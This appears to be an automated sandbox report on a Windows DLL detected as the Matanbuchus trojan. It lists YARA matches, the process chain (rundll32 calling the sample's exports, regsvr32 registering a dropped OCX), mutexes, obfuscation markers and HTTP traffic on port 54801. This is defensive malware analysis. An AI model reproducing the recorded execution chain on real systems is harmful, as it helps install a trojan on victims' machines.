Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12

Source: classification engine

Classification label: mal100.troj.evad.winDLL@44/7@3/2

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\8f08

Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\8f08
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1020:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7588
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3164e4ff-c709-4dec-a976-0f3f08fd1379

Source: file.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense

Source: file.dll

Virustotal: Detection: 16%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\file.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInit
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Init
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInit	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Main	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",Init	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winrnr.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Yara detected Matanbuchus

Source: file.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Source: Yara match	File source: file.dll, type: SAMPLE
Source: Yara match	File source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D15C6 push ecx; ret	14_2_7F3D15D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE15C6 push ecx; ret	18_2_7EDE15D9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE15C6 push ecx; ret	34_2_7EEE15D9

Drops PE files

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\8f08\user-PC\user-PC.ocx

Hooking and other Techniques for Hiding and Protection

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49994

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_7EDCC7B0 GetSystemDefaultLangID,IsIconic,SetLastError,GetCommandLineW,lstrlenA,GetSystemDefaultLCID,

18_2_7EDCC7B0

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
